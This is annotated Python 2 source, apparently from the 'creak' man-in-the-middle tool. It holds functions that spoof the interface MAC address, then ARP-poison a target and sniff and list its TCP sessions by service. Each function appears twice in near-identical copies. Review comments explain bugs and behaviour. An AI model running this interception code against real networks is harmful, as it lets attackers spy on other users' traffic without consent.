def get_mitm(parsed_args):
    """
    create an object of type Mitm based on arguments received

    Takes the parsed CLI namespace, fills in whatever it lacks (gateway,
    target, MAC address) by prompting the user or reading ``./creak/config``,
    optionally changes the MAC address of the chosen interface, and builds
    the engine-specific Mitm object.

    Parameters:
        parsed_args: argparse-style namespace. Attributes read here are
            ``dev``, ``source``, ``target``, ``verbosity``, ``debug``,
            ``spoof``, ``macaddr``, ``manufacturer`` and ``mode``.
            ``source`` and ``target`` are written back onto it when they
            were missing.

    Returns:
        A 4-tuple ``(args, changed, original_mac_addr, mitm)``: ``changed``
        tells whether the interface MAC was really altered,
        ``original_mac_addr`` is the MAC read before any change (returned so
        the caller can put it back), and ``mitm`` is a ``cmitm.ScapyMitm``
        or a ``cmitm.PcapMitm`` depending on the ``ENGINE`` config entry.

    Raises:
        SystemExit: no interface given, or the prompted gateway / target is
            not an IPv4 address.
        ConfigParser.Error: ``conf.read`` ignores a missing file silently,
            so a missing ``./creak/config`` (or one without an ``output``
            section) surfaces at the first ``getboolean`` call.
    """
    args = parsed_args

    if not args.dev:
        sys.exit(sys.argv[0] + ' -h for help\n[!] Must specify interface')

    # args.dev is a list; a single entry comes out as the plain interface
    # name. NOTE(review): several entries yield one string such as
    # eth0','eth1 (quotes included), which get_mac_by_dev is unlikely to
    # expect -- confirm whether more than one interface is really supported.
    dev = "%s" % "','".join(args.dev)

    # Remember the current MAC before anything touches the interface; it is
    # handed back to the caller together with the `changed` flag.
    original_mac_addr = utils.get_mac_by_dev(dev)
    mac_addr, changed = original_mac_addr, False

    if not args.source:
        try:
            args.source = utils.get_default_gateway_linux()
        except OSError:
            # Interactive fallback (raw_input: this is Python 2 code).
            args.source = raw_input('[!] Unable to retrieve default gateway, please specify one: ')
            if not utils.is_ipv4(args.source):
                # `exit` is the site-module builtin, not sys.exit; it is not
                # available when python is started with -S.
                exit('[!] Unable to retrieve default gateway, please specify one using -s option')
            else:
                # No-op branch.
                pass

    if not args.target:
        args.target = raw_input('[?] No target address specified, please insert one: ')
        if not utils.is_ipv4(args.target):
            exit('[!] Must specify at least one target address')
    else:
        # A one-element list is collapsed to a plain string; a longer list
        # is passed through as-is, so downstream code must accept both.
        if len(args.target) == 1:
            args.target = ''.join(args.target)

    # Relative path: the config is resolved against the current working
    # directory, not the module location.
    conf = ConfigParser.ConfigParser()
    conf.read('./creak/config')
    verbose = conf.getboolean('output', 'VERBOSE')
    debug = conf.getboolean('output', 'DEBUG')

    # CLI flags can only switch these on, never off.
    if args.verbosity:
        verbose = True
    if args.debug:
        debug = True

    # `is True` matches only the bool True (a store_true style flag).
    if args.spoof is True:
        # Exact match on 'y': 'Y', 'yes' or an empty answer all decline.
        choice = raw_input('[+] In order to change MAC address ' + G + dev + W
                           + ' must be temporary put down. Proceed?[y/n] ')
        if choice == 'y':
            if not args.macaddr and not args.manufacturer:
                mac_addr = utils.fake_mac_address([], 1)
            elif args.macaddr and not args.manufacturer:
                # A requested MAC equal to the current one leaves mac_addr
                # untouched (change_mac is still attempted below).
                if utils.parse_mac(args.macaddr) != utils.parse_mac(original_mac_addr):
                    mac_addr = utils.fake_mac_address(utils.mac_to_hex(args.macaddr))
            elif args.manufacturer:
                macs = utils.get_manufacturer(args.manufacturer)
                # random.choice raises IndexError when the lookup returned
                # an empty list.
                mac_addr = utils.fake_mac_address(utils.mac_to_hex(random.choice(macs)))

            try:
                utils.change_mac(dev, mac_addr)
                changed = True
            except OSError:
                # Failure is swallowed: `changed` stays False, but mac_addr
                # keeps the new value, so the banner below reports a MAC the
                # interface does not actually carry.
                pass

        # Reached even when the user declined: the message and the sleep sit
        # under `spoof`, not under `choice == 'y'`.
        print("[+] Waiting for wireless reactivation..")

        # Mode semantics are defined by the caller; presumably modes 1 and 2
        # need the longer settle time -- verify against the argument parser.
        if args.mode == 1 or args.mode == 2:
            time.sleep(10)
        else:
            time.sleep(4)

    # no spoof but set mac address anyway
    # (the interface is NOT reconfigured here; only the value passed on to
    # the Mitm object changes)
    elif args.macaddr:
        mac_addr = args.macaddr

    print("[+] Using " + G + mac_addr + W + " MAC address\n"
          "[+] Set " + G + args.source + W + " as default gateway")

    # Engine choice comes from the config file only; there is no CLI switch.
    if conf.get('output', 'ENGINE').lower() == 'scapy':
        return (args, changed, original_mac_addr,
                cmitm.ScapyMitm(dev, utils.parse_mac(mac_addr), args.source,
                                args.target, debug, verbose))
    return (args, changed, original_mac_addr,
            cmitm.PcapMitm(dev, utils.parse_mac(mac_addr), args.source,
                           args.target, debug, verbose))
def get_mitm(parsed_args):
    """
    create an object of type Mitm based on arguments received

    Takes the parsed CLI namespace, fills in whatever it lacks (gateway,
    target, MAC address) by prompting the user or reading ``./creak/config``,
    optionally changes the MAC address of the chosen interface, and builds
    the engine-specific Mitm object.

    Parameters:
        parsed_args: argparse-style namespace. Attributes read here are
            ``dev``, ``source``, ``target``, ``verbosity``, ``debug``,
            ``spoof``, ``macaddr``, ``manufacturer`` and ``mode``.
            ``source`` and ``target`` are written back onto it when they
            were missing.

    Returns:
        A 4-tuple ``(args, changed, original_mac_addr, mitm)``: ``changed``
        tells whether the interface MAC was really altered,
        ``original_mac_addr`` is the MAC read before any change (returned so
        the caller can put it back), and ``mitm`` is a ``cmitm.ScapyMitm``
        or a ``cmitm.PcapMitm`` depending on the ``ENGINE`` config entry.

    Raises:
        SystemExit: no interface given, or the prompted gateway / target is
            not an IPv4 address.
        ConfigParser.Error: ``conf.read`` ignores a missing file silently,
            so a missing ``./creak/config`` (or one without an ``output``
            section) surfaces at the first ``getboolean`` call.
    """
    args = parsed_args

    if not args.dev:
        sys.exit(sys.argv[0] + ' -h for help\n[!] Must specify interface')

    # args.dev is a list; a single entry comes out as the plain interface
    # name. NOTE(review): several entries yield one string such as
    # eth0','eth1 (quotes included), which get_mac_by_dev is unlikely to
    # expect -- confirm whether more than one interface is really supported.
    dev = "%s" % "','".join(args.dev)

    # Remember the current MAC before anything touches the interface; it is
    # handed back to the caller together with the `changed` flag.
    original_mac_addr = utils.get_mac_by_dev(dev)
    mac_addr, changed = original_mac_addr, False

    if not args.source:
        try:
            args.source = utils.get_default_gateway_linux()
        except OSError:
            # Interactive fallback (raw_input: this is Python 2 code).
            args.source = raw_input('[!] Unable to retrieve default gateway, please specify one: ')
            if not utils.is_ipv4(args.source):
                # `exit` is the site-module builtin, not sys.exit; it is not
                # available when python is started with -S.
                exit('[!] Unable to retrieve default gateway, please specify one using -s option')
            else:
                # No-op branch.
                pass

    if not args.target:
        args.target = raw_input('[?] No target address specified, please insert one: ')
        if not utils.is_ipv4(args.target):
            exit('[!] Must specify at least one target address')
    else:
        # A one-element list is collapsed to a plain string; a longer list
        # is passed through as-is, so downstream code must accept both.
        if len(args.target) == 1:
            args.target = ''.join(args.target)

    # Relative path: the config is resolved against the current working
    # directory, not the module location.
    conf = ConfigParser.ConfigParser()
    conf.read('./creak/config')
    verbose = conf.getboolean('output', 'VERBOSE')
    debug = conf.getboolean('output', 'DEBUG')

    # CLI flags can only switch these on, never off.
    if args.verbosity:
        verbose = True
    if args.debug:
        debug = True

    # `is True` matches only the bool True (a store_true style flag).
    if args.spoof is True:
        # Exact match on 'y': 'Y', 'yes' or an empty answer all decline.
        choice = raw_input('[+] In order to change MAC address ' + G + dev + W
                           + ' must be temporary put down. Proceed?[y/n] ')
        if choice == 'y':
            if not args.macaddr and not args.manufacturer:
                mac_addr = utils.fake_mac_address([], 1)
            elif args.macaddr and not args.manufacturer:
                # A requested MAC equal to the current one leaves mac_addr
                # untouched (change_mac is still attempted below).
                if utils.parse_mac(args.macaddr) != utils.parse_mac(original_mac_addr):
                    mac_addr = utils.fake_mac_address(utils.mac_to_hex(args.macaddr))
            elif args.manufacturer:
                macs = utils.get_manufacturer(args.manufacturer)
                # random.choice raises IndexError when the lookup returned
                # an empty list.
                mac_addr = utils.fake_mac_address(utils.mac_to_hex(random.choice(macs)))

            try:
                utils.change_mac(dev, mac_addr)
                changed = True
            except OSError:
                # Failure is swallowed: `changed` stays False, but mac_addr
                # keeps the new value, so the banner below reports a MAC the
                # interface does not actually carry.
                pass

        # Reached even when the user declined: the message and the sleep sit
        # under `spoof`, not under `choice == 'y'`.
        print("[+] Waiting for wireless reactivation..")

        # Mode semantics are defined by the caller; presumably modes 1 and 2
        # need the longer settle time -- verify against the argument parser.
        if args.mode == 1 or args.mode == 2:
            time.sleep(10)
        else:
            time.sleep(4)

    # no spoof but set mac address anyway
    # (the interface is NOT reconfigured here; only the value passed on to
    # the Mitm object changes)
    elif args.macaddr:
        mac_addr = args.macaddr

    print("[+] Using " + G + mac_addr + W + " MAC address\n"
          "[+] Set " + G + args.source + W + " as default gateway")

    # Engine choice comes from the config file only; there is no CLI switch.
    if conf.get('output', 'ENGINE').lower() == 'scapy':
        return (args, changed, original_mac_addr,
                cmitm.ScapyMitm(dev, utils.parse_mac(mac_addr), args.source,
                                args.target, debug, verbose))
    return (args, changed, original_mac_addr,
            cmitm.PcapMitm(dev, utils.parse_mac(mac_addr), args.source,
                           args.target, debug, verbose))
    def list_sessions(self, stop, target_b=None, port=None):
        """
        Try to get all TCP sessions of the target

        Starts a daemon thread running ``self.poison`` and then captures on
        ``self.dev`` with the filter produced by ``_build_pcap_filter``,
        printing every new TCP endpoint pair and recording it in
        ``self.sessions``. Ends when ``stop()`` returns a true value or on
        Ctrl-C.

        Parameters:
            stop: zero-argument callable polled once per captured packet; a
                true value ends the capture. It is consulted only when a
                packet arrives, so without matching traffic the request is
                not noticed.
            target_b: optional second host. When given and different from
                ``self.gateway`` it is passed to ``self.poison`` and the
                value ``utils.get_mac_by_ip(target_b)`` returns is shown in
                the banner instead of the default gateway.
            port: optional port forwarded to ``_build_pcap_filter``.

        Returns:
            None. The local ``sessions`` dict only drives numbering and
            labelling of the output; the keys are appended to
            ``self.sessions``.

        Side effects:
            The poison thread is never joined or stopped here. Only the
            Ctrl-C path calls ``self.restore(2)`` and ``set_ip_forward(0)``;
            the ``stop()`` break path leaves that to the caller.
        """
        # Labels for well-known TCP ports; anything else is reported as
        # "Others". The leading space is part of the printed text.
        notorious_services = {
            20: ' ftp-data session',
            21: ' ftp-data session',
            22: ' ssh session',
            23: ' telnet session',
            25: ' SMTP session',
            80: ' HTTP session',
            110: ' POP3 session',
            143: ' IMAP session',
            194: ' IRC session',
            220: ' IMAPv3 session',
            443: ' SSL session',
            445: ' SAMBA session',
            989: ' FTPS session',
            990: ' FTPS session',
            992: ' telnet SSL session',
            993: ' IMAP SSL session',
            994: ' IRC SSL session'
        }

        # `source` is used only in the banner below. NOTE(review): the two
        # branches produce different kinds of values (the gateway lookup vs.
        # a helper whose name says it returns a MAC) -- confirm intent.
        source = utils.get_default_gateway_linux()
        if target_b and target_b != self.gateway:
            source = utils.get_mac_by_ip(target_b)
        pcap_filter = self._build_pcap_filter("ip host ", port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)  # we need only self.target packets
        # need to create a daemon that continually poison our target
        # (daemon=True: it dies with the interpreter, nothing stops it here)
        poison_thread = Thread(target=self.poison, args=(
            2,
            target_b,
        ))
        poison_thread.daemon = True
        poison_thread.start()
        # self.target may be a list or a single string (see the caller).
        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
              source + W + ' and ' + R + (','.join(self.target) if isinstance(
                  self.target, list) else self.target) + W + '\n')
        sessions = {}
        try:
            for _, pkt in packets:
                # Polled per packet only; pcap iteration blocks between them.
                if stop():
                    break
                eth = dpkt.ethernet.Ethernet(pkt)
                # Assumes eth.data is an IP packet because the filter starts
                # with "ip host"; a non-IP frame would fail on `.p`.
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    # Drops only segments whose flag byte is exactly RST;
                    # RST|ACK and everything else still passes.
                    if tcp.flags != dpkt.tcp.TH_RST:
                        # Direction-sensitive key: the two directions of one
                        # connection appear as two separate entries.
                        sess = "%-25s <-> %25s" % (
                            inet_ntoa(ip_packet.src) + ":" + str(tcp.sport),
                            inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport))
                        check = False
                        if sess not in sessions:
                            check = True

                        # Default label, overwritten on every packet; the
                        # source port wins when both ports are well known.
                        sessions[sess] = "Others"

                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]

                        # First sighting: print with its running number and
                        # record the key on the instance.
                        if check is True:
                            print(" [{:^5}] {} : {}".format(
                                len(sessions), sess, sessions[sess]))
                            self.sessions.append(sess)

        except KeyboardInterrupt:
            # Cleanup runs on Ctrl-C only; restore() is defined elsewhere on
            # the class.
            print('[+] Session scan interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
    def list_sessions(self, stop, target_b=None, port=None):
        """
        Try to get all TCP sessions of the target

        Starts a daemon thread running ``self.poison`` and then captures on
        ``self.dev`` with the filter produced by ``_build_pcap_filter``,
        printing every new TCP endpoint pair and recording it in
        ``self.sessions``. Ends when ``stop()`` returns a true value or on
        Ctrl-C.

        Parameters:
            stop: zero-argument callable polled once per captured packet; a
                true value ends the capture. It is consulted only when a
                packet arrives, so without matching traffic the request is
                not noticed.
            target_b: optional second host. When given and different from
                ``self.gateway`` it is passed to ``self.poison`` and the
                value ``utils.get_mac_by_ip(target_b)`` returns is shown in
                the banner instead of the default gateway.
            port: optional port forwarded to ``_build_pcap_filter``.

        Returns:
            None. The local ``sessions`` dict only drives numbering and
            labelling of the output; the keys are appended to
            ``self.sessions``.

        Side effects:
            The poison thread is never joined or stopped here. Only the
            Ctrl-C path calls ``self.restore(2)`` and ``set_ip_forward(0)``;
            the ``stop()`` break path leaves that to the caller.
        """
        # Labels for well-known TCP ports; anything else is reported as
        # "Others". The leading space is part of the printed text.
        notorious_services = {
            20: ' ftp-data session',
            21: ' ftp-data session',
            22: ' ssh session',
            23: ' telnet session',
            25: ' SMTP session',
            80: ' HTTP session',
            110: ' POP3 session',
            143: ' IMAP session',
            194: ' IRC session',
            220: ' IMAPv3 session',
            443: ' SSL session',
            445: ' SAMBA session',
            989: ' FTPS session',
            990: ' FTPS session',
            992: ' telnet SSL session',
            993: ' IMAP SSL session',
            994: ' IRC SSL session'
        }

        # `source` is used only in the banner below. NOTE(review): the two
        # branches produce different kinds of values (the gateway lookup vs.
        # a helper whose name says it returns a MAC) -- confirm intent.
        source = utils.get_default_gateway_linux()
        if target_b and target_b != self.gateway:
            source = utils.get_mac_by_ip(target_b)
        pcap_filter = self._build_pcap_filter("ip host ", port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter) # we need only self.target packets
        # need to create a daemon that continually poison our target
        # (daemon=True: it dies with the interpreter, nothing stops it here)
        poison_thread = Thread(target=self.poison, args=(2, target_b, ))
        poison_thread.daemon = True
        poison_thread.start()
        # self.target may be a list or a single string (see the caller).
        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W
              + ' and ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
        sessions = {}
        try:
            for _, pkt in packets:
                # Polled per packet only; pcap iteration blocks between them.
                if stop():
                    break
                eth = dpkt.ethernet.Ethernet(pkt)
                # Assumes eth.data is an IP packet because the filter starts
                # with "ip host"; a non-IP frame would fail on `.p`.
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    # Drops only segments whose flag byte is exactly RST;
                    # RST|ACK and everything else still passes.
                    if tcp.flags != dpkt.tcp.TH_RST:
                        # Direction-sensitive key: the two directions of one
                        # connection appear as two separate entries.
                        sess = "%-25s <-> %25s" % (inet_ntoa(ip_packet.src) + ":"
                                                   + str(tcp.sport), inet_ntoa(ip_packet.dst) + ":"
                                                   + str(tcp.dport))
                        check = False
                        if sess not in sessions:
                            check = True

                        # Default label, overwritten on every packet; the
                        # source port wins when both ports are well known.
                        sessions[sess] = "Others"

                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]

                        # First sighting: print with its running number and
                        # record the key on the instance.
                        if check is True:
                            print(" [{:^5}] {} : {}".format(len(sessions), sess, sessions[sess]))
                            self.sessions.append(sess)

        except KeyboardInterrupt:
            # Cleanup runs on Ctrl-C only; restore() is defined elsewhere on
            # the class.
            print('[+] Session scan interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)